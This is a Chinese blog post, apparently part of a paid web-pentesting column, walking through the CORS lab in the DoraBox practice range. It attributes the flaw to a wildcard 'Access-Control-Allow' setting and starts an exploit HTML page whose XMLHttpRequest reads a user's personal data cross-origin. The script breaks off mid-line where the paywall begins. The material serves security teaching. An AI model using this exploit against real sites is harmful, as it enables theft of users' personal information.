【漏洞挖掘】——38、DoraBox中CORS靶场

FLy_鹏程万里

已于 2024-09-12 11:35:12 修改

阅读量253

点赞数

CC 4.0 BY-SA版权

分类专栏：【WEB渗透】文章标签：渗透测试信息安全网络安全

于 2024-06-06 17:41:52 首次发布

本文链接：https://blog.youkuaiyun.com/Fly_hps/article/details/139506326

【WEB渗透】专栏收录该内容

214 篇文章 ¥99.90 ¥299.90

订阅专栏

本文深入探讨了DoraBox中的CORS（跨源资源共享）靶场，通过源码分析揭示了'Access-Control-Allow:*'配置导致的安全问题。作者展示了如何利用这个漏洞读取用户信息，并提出了通过限制Access-Control-Allow来防御此类攻击的策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

源码分析

首先查看一下cors设计代码，从下面可以看到"Access-Control-Allow：*"这个CORS配置：

然后访问一下该页面，可以从下面的页面查看到有用户的个人信息：

漏洞利用

下面构造CORS.html页面来读取信息：

<!DOCTYPE html>
<html>
<body>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getEle

了解本专栏